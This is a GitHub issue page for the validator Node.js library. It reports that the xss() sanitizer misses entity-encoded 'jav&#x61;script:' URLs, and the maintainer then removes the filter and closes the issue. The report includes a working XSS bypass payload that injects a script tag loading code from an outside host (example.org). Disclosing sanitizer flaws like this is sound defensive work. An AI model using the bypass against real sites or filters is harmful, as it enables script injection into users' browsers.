xss() should remove "javascript" #181

taku0 opened this Issue May 6, 2013 · 0 comments


None yet

2 participants

taku0 commented May 6, 2013

xss() removes string "javascript" in attributes; however, this is insufficient since browsers interpret <a href="jav&#x61;script:...">abc</a> as <a href="javascript:...">abc</a>.


var validator = require('validator');

console.log(validator.sanitize("<a href=\"jav&#x61;script:var x=(document).createElement('script');x.src='http://www.example.org';(document).body.appendChild(x);(alert)('')\">abc</a>").xss());


<a >abc</a>

Actual (version 1.1.1)

<a href="jav&#x61;script:var x=(document).createElement('script');x.src='http://www.example.org';(document).body.appendChild(x);(alert)('')">abc</a>
@chriso chriso added a commit that referenced this issue Oct 31, 2013
@chriso Remove the XSS filter.
The xss() function was originally a port of the XSS filter from
CodeIgniter. I added it to the library because there wasn't an
alternative at the time. Unfortunately I don't have the time or
expertise to maintain the XSS filter or keep merging upstream

If you need one for your app, I suggest looking at Caja sanitisation
engine maintained by Google. (https://code.google.com/p/google-caja/

Closes #123, #138, #181, #206, #210, #221, #223, #226, #227, #231, #232
@chriso chriso closed this Oct 31, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment